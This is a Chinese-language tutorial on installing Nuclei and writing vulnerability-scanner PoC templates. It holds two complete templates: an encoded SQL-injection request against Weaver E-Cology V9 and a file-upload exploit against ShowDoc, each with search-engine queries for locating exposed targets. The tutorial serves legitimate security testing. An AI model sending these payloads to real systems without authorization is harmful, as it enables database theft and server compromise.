前言
Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。
官网:https://nuclei.projectdiscovery.io/
项目地址:https://github.com/projectdiscovery/nuclei
【官网】Nuclei-Templates项目地址:https://github.com/projectdiscovery/nuclei-templates
【三方收集】Nuclei脚本:https://github.com/ExpLangcn/NucleiTP
安装
mac下brew install nucleiwindows下下载exe,配置环境变量
使用
扫描批量url
nucle -l urls.txt扫描单个目标
nuclei -target baidu.com加载对应的poc脚本,可以是当前路径下
nuclei -t test.yaml因此,推荐使用,批量检测urls.txt文本内容,poc为test.yaml,输出结果到result.txt(为了避免扫描量太大,淹没了bash运行界面)
nuclei -l urls.txt -t test.yaml -o result.txttips:更详细的参数,见官方:
https://nuclei.projectdiscovery.io/nuclei/get-started/
Usage:nuclei [flags]Flags:TARGET:-u, -target string[] target URLs/hosts to scan-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)-resume string resume scan using resume.cfg (clustering will be disabled)-sa, -scan-all-ips scan all the IP's associated with dns record-iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)TEMPLATES:-nt, -new-templates run only new templates added in latest nuclei-templates release-ntv, -new-templates-version string[] run new templates added in specific version-as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping-t, -templates string[] list of template or template directory to run (comma-separated, file)-tu, -template-url string[] list of template urls to run (comma-separated, file)-w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)-wu, -workflow-url string[] list of workflow urls to run (comma-separated, file)-validate validate the passed templates to nuclei-nss, -no-strict-syntax disable strict syntax check on templates-td, -template-display displays the templates content-tl list all available templatesFILTERING:-a, -author string[] templates to run based on authors (comma-separated, file)-tags string[] templates to run based on tags (comma-separated, file)-etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)-itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration-id, -template-id string[] templates to run based on template ids (comma-separated, file)-eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)-it, -include-templates string[] templates to be executed even if they are excluded either by default or configuration-et, -exclude-templates string[] template or template directory to exclude (comma-separated, file)-em, -exclude-matchers string[] template matchers to exclude in result-s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown-es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown-pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, network, workflow, ssl, websocket, whois-ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, network, workflow, ssl, websocket, whois-tc, -template-condition string[] templates to run based on expression conditionOUTPUT:-o, -output string output file to write found issues/vulnerabilities-sresp, -store-resp store all request/response passed through nuclei to output directory-srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output")-silent display findings only-nc, -no-color disable output content coloring (ANSI escape codes)-json write output in JSONL(ines) format-irr, -include-rr include request/response pairs in the JSONL output (for findings only)-nm, -no-meta disable printing result metadata in cli output-ts, -timestamp enables printing timestamp in cli output-rdb, -report-db string nuclei reporting database (always use this to persist report data)-ms, -matcher-status display match failure status-me, -markdown-export string directory to export results in markdown format-se, -sarif-export string file to export results in SARIF formatCONFIGURATIONS:-config string path to the nuclei configuration file-fr, -follow-redirects enable following redirects for http templates-fhr, -follow-host-redirects follow redirects on the same host-mr, -max-redirects int max number of redirects to follow for http templates (default 10)-dr, -disable-redirects disable redirects for http templates-rc, -report-config string nuclei reporting module configuration file-H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)-V, -var value custom vars in key=value format-r, -resolvers string file containing resolver list for nuclei-sr, -system-resolvers use system DNS resolving as error fallback-dc, -disable-clustering disable clustering of requests-passive enable passive HTTP response processing mode-fh2, -force-http2 force http2 connection on requests-ev, -env-vars enable environment variables to be used in template-cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts-ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts-ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts-sml, -show-match-line show match lines for file templates, works with extractors only-ztls use ztls library with autofallback to standard one for tls13-sni string tls sni hostname to use (default: input domain name)-sandbox sandbox nuclei for safe templates execution-i, -interface string network interface to use for network scan-at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)-sip, -source-ip string source ip address to use for network scan-config-directory string override the default config path ($home/.config)-rsr, -response-size-read int max response size to read in bytes (default 10485760)-rss, -response-size-save int max response size to read in bytes (default 1048576)INTERACTSH:-iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)-itoken, -interactsh-token string authentication token for self-hosted interactsh server-interactions-cache-size int number of requests to keep in the interactions cache (default 5000)-interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)-interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)-interactions-cooldown-period int extra time for interaction polling before exiting (default 5)-ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templatesUNCOVER:-uc, -uncover enable uncover engine-uq, -uncover-query string[] uncover search query-ue, -uncover-engine string[] uncover search engine (shodan,shodan-idb,fofa,censys,quake,hunter,zoomeye,netlas,criminalip) (default shodan)-uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port")-ul, -uncover-limit int uncover results to return (default 100)-ucd, -uncover-delay int delay between uncover query requests in seconds (0 to disable) (default 1)RATE-LIMIT:-rl, -rate-limit int maximum number of requests to send per second (default 150)-rlm, -rate-limit-minute int maximum number of requests to send per minute-bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)-c, -concurrency int maximum number of templates to be executed in parallel (default 25)-hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)-headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)OPTIMIZATIONS:-timeout int time to wait in seconds before timeout (default 10)-retries int number of times to retry a failed request (default 1)-ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)-mhe, -max-host-error int max errors for a host before skipping from scan (default 30)-nmhe, -no-mhe disable skipping host from scan based on errors-project use a project folder to avoid sending same request multiple times-project-path string set a specific project path-spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)-stream stream mode - start elaborating without sorting the input-ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default 0)-irt, -input-read-timeout duration timeout on input read (default 3m0s)-nh, -no-httpx disable httpx probing for non-url input-no-stdin disable stdin processingHEADLESS:-headless enable templates that require headless browser support (root user on Linux will disable sandbox)-page-timeout int seconds to wait for each page in headless mode (default 20)-sb, -show-browser show the browser on the screen when running templates with headless mode-sc, -system-chrome use local installed Chrome browser instead of nuclei installed-lha, -list-headless-action list available headless actionsDEBUG:-debug show all requests and responses-dreq, -debug-req show all sent requests-dresp, -debug-resp show all received responses-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)-pi, -proxy-internal proxy all internal requests-ldf, -list-dsl-function list all supported DSL function signatures-tlog, -trace-log string file to write sent requests trace log-elog, -error-log string file to write sent requests error log-version show nuclei version-hm, -hang-monitor enable nuclei hang monitoring-v, -verbose show verbose output-profile-mem string optional nuclei memory profile dump file-vv display templates loaded for scan-svd, -show-var-dump show variables dump for debugging-ep, -enable-pprof enable pprof debugging server-tv, -templates-version shows the version of the installed nuclei-templates-hc, -health-check run diagnostic check upUPDATE:-un, -update update nuclei engine to the latest released version-ut, -update-templates update nuclei-templates to latest released version-ud, -update-template-dir string custom directory to install / update nuclei-templates-duc, -disable-update-check disable automatic nuclei/templates update checkSTATISTICS:-stats display statistics about the running scan-sj, -stats-json write statistics data to an output file in JSONL(ines) format-si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)-m, -metrics expose nuclei metrics on a port-mp, -metrics-port int port to expose nuclei metrics on (default 9092)
id: CNVD-2023-12632info:name: E-Cology V9 - SQL Injectionauthor: daffainfoseverity: highdescription: |Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.reference:- https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003- https://blog.csdn.net/qq_50854662/article/details/129992329metadata:max-request: 1verified: truefofa-query: app="泛微-协同商务系统"shodan-query: 'ecology_JSessionid'tags: cnvd,cnvd2023,ecology,sqli# a' union select 1,''+(SELECT md5(9999999))+'# URL encoded 3 timeshttp:- raw:- |POST /mobile/plugin/browser.jsp HTTP/1.1Host: {{Hostname}}Content-Type: application/x-www-form-urlencodedisDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37matchers-condition: andmatchers:- type: wordpart: bodywords:- '283f42764da6dba2522412916b031080'- '"autoCount"'- '"autoGet"'condition: and- type: statusstatus:- 200
matchers:- type: wordpart: bodywords:- '283f42764da6dba2522412916b031080'- '"autoCount"'- '"autoGet"'condition: and- type: statusstatus:- 200
| Matcher Type | Part Matched | 说明 |
| status | Integer Comparisons of Part | 状态码 |
| size | Content Length of Part | 大小 |
| word | Part for a protocol | 关键字匹配 |
| regex | Part for a protocol | 正则匹配 |
| binary | Part for a protocol | 二进制匹配 |
| dsl | Part for a protocol | dsl复杂匹配 |
二进制的匹配
matchers:- type: binarybinary:- "504B0304" # zip archive- "526172211A070100" # RAR archive version 5.0- "FD377A585A0000" # xz tar.xz archivecondition: orpart: body
DSL类型的复杂匹配器可以使用辅助函数来构建更复杂的表达式,以便访问包含基于每个协议的各种数据的协议响应。
matchers:- type: dsldsl:- "len(body)<1024 && status_code==200"- "contains(toupper(body), md5(cookie))"
正则匹配的可以看这个完整的poc
id: CNVD-2020-26585info:name: Showdoc <2.8.6 - File Uploadsauthor: pikpikcu,Co5mosseverity: criticaldescription: |ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.reference:https://vul.wangan.com/a/CNVD-2020-26585https://blog.csdn.net/qq_48985780/article/details/122211136https://github.com/star7th/showdoc/pull/1059classification:: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L: 9.9: CWE-434metadata:: 2verified: true: app="ShowDoc"tags: cnvd,cnvd2020,showdoc,fileuploadhttp:raw:|POST /index.php?s=/home/page/uploadImg HTTP/1.1Host: {{Hostname}}: multipart/form-data; boundary=--------------------------835846770881083140190633----------------------------835846770881083140190633: form-data; name="editormd-image-file"; filename="{{randstr}}.<>txt": text/plaintest{{randstr}}----------------------------835846770881083140190633--|GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1Host: {{Hostname}}: andmatchers:type: wordpart: bodywords:"test{{randstr}}"type: statusstatus:200extractors:type: regexname: datepart: bodygroup: 1regex:'(d{4}-d{2}-d{2})\/([a-f0-9]+.txt)'internal: truetype: regexname: filepart: bodygroup: 2regex:'(d{4}-d{2}-d{2})\/([a-f0-9]+.txt)'internal: true
Poc 命名格式:编号_漏洞应用名_版本号_漏洞类型名称,然后把文件名称中的所有字母改成小写,所有的符号改成 _。
文件名不能有特殊字符和大写字母,最后出来的文件名应该像这样:
中文好记的名字:CNVD-2023-12632_泛微e-cology_V9_SQL注入英文poc名字:CNVD-2023-12632_E-Cology_V9_sqli.yaml
| 英文名称 | 中文名称 | 缩写 |
| Cross Site Scripting | 跨站脚本 | xss |
| Cross Site Request Forgery | 跨站请求伪造 | csrf |
| SQL Injection | Sql注入 | sql-inj |
| LDAP Injection | ldap注入 | ldap-inj |
| Mail Command Injection | 邮件命令注入 | smtp-inj |
| Null Byte Injection | 空字节注入 | null-byte-inj |
| CRLF Injection | CRLF注入 | crlf-inj |
| SSI Injection | Ssi注入 | ssi-inj |
| XPath Injection | Xpath注入 | xpath-inj |
| XML Injection | Xml注入 | xml-inj |
| XQuery Injection | Xquery 注入 | xquery-inj |
| Command Execution | 命令执行 | cmd-exec |
| Code Execution | 代码执行 | code-exec |
| Remote File Inclusion | 远程文件包含 | rfi |
| Local File Inclusion | 本地文件包含 | lfi |
| Abuse of Functionality | 功能函数滥用 | func-abuse |
| Brute Force | 暴力破解 | brute-force |
| Buffer Overflow | 缓冲区溢出 | buffer-overflow |
| Content Spoofing | 内容欺骗 | spoofing |
| Credential Prediction | 证书预测 | credential-prediction |
| Session Prediction | 会话预测 | session-prediction |
| Denial of Service | 拒绝服务 | dos |
| Fingerprinting | 指纹识别 | finger |
| Format String | 格式化字符串 | format-string |
| HTTP Response Smuggling | http响应伪造 | http-response-smuggling |
| HTTP Response Splitting | http响应拆分 | http-response-splitting |
| HTTP Request Splitting | http请求拆分 | http-request-splitting |
| HTTP Request Smuggling | http请求伪造 | http-request-smuggling |
| HTTP Parameter Pollution | http参数污染 | hpp |
| Integer Overflows | 整数溢出 | int-overflow |
| Predictable Resource Location | 可预测资源定位 | res-location |
| Session Fixation | 会话固定 | session-fixation |
| URL Redirector Abuse | url重定向 | redirect |
| Privilege Escalation | 权限提升 | privilege-escalation |
| Resolve Error | 解析错误 | resolve-error |
| Arbitrary File Creation | 任意文件创建 | file-creation |
| Arbitrary File Download | 任意文件下载 | file-download |
| Arbitrary File Deletion | 任意文件删除 | file-deletion |
| Arbitrary File Read | 任意文件读取 | file-read |
| Backup File Found | 备份文件发现 | bak-file-found |
| Database Found | 数据库发现 | db-found |
| Directory Listing | 目录遍历 | dir-listing |
| Directory Traversal | 目录穿越 | dir-traversal |
| File Upload | 文件上传 | file-upload |
| Login Bypass | 登录绕过 | login-bypass |
| Weak Password | 弱密码 | weak-pass |
| Remote Password Change | 远程密码修改 | remote-pass-change |
| Code Disclosure | 代码泄漏 | code-disclosure |
| Path Disclosure | 路径泄漏 | path-disclosure |
| Information Disclosure | 信息泄漏 | info-disclosure |
| Security Mode Bypass | 安全模式绕过 | sec-bypass |
| Malware | 挂马 | mal |
| Black Link | 暗链 | black-link |
| Backdoor | 后门 | backdoor |
| Insecure Cookie Handling | 不安全的Cookie | insecure-cookie-handling |
| Shellcode | Shellcode | shellcode |
| Variable Coverage | 变量覆盖 | variable-coverage |
| Injecting Malware Codes | 恶意代码注入 | injecting-malware-codes |
| Upload Files | 文件上传 | upload-files |
| Local Overflow | 本地溢出 | local-overflow |
| Path Traversal | 目录穿越 | path-traversal |
| Unauthorized Access | 未授权访问 | unauth-access |
| Remote Overflow | 远程溢出 | remote-overflow |
| Man-in-the-middle | 中间人攻击 | mitm |
| Out of Memory | 内存溢出 | out-of-memory |
| Buffer Over-read | 缓冲区越界读 | buffer-over-read |
| Backup File Found | 备份文件泄漏 | backup-file-found |
| Use After Free | 释放后使用 | uaf |
| DNS Hijacking | DNS劫持 | dns-hijacking |
| Improper Input Validation | 不正确的输入校验 | improper-input-validation |
| Universal Cross-site Scripting | 通用型XSS | uxss |
| Server-Side Request Forgery | 服务器端请求伪造 | ssrf |
| Other | 其他 | other |
原文始发于微信公众号(SecD安全团队):Nuclei poc编写-教程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论